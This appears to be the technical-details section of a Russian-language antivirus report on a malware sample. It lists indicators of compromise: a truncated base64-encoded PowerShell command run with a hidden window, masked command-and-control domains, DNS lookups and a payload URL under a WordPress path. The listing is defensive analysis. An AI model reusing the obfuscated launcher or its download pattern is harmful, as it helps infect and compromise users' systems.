Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAQQBwAGEAcABiAGwAbwBmAHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARgBjAGoAbwBvAHQAbgBiAGQAdQB4ACAAIwA+ACAAJABGAGMAcgBhAHMAcgBiAHkAaQBjAGsAdwA9ACcATg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1984
- %TEMP%\869331.cvr
- 'sk########udio.000webhostapp.com':443
- 'do##.##zenetworks.com':80
- 'do##.##zenetworks.com':443
- 'su###arora.com':443
- http://do##.##zenetworks.com/wp-includes/5djb8pooi-pn7tnasr-96945/
- 'sk########udio.000webhostapp.com':443
- 'do##.##zenetworks.com':443
- 'su###arora.com':443
- DNS ASK ho##.#crisat.org
- DNS ASK te##.salpg.com
- DNS ASK sk########udio.000webhostapp.com
- DNS ASK do##.##zenetworks.com
- DNS ASK su###arora.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAQQBwAGEAcABiAGwAbwBmAHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARgBjAGoAbwBvAHQAbgBiAGQAdQB4ACAAIwA+ACAAJABGAGMAcgBhAHMAcgBiAHkAaQBjAGsAdwA9ACcATg...' (со скрытым окном)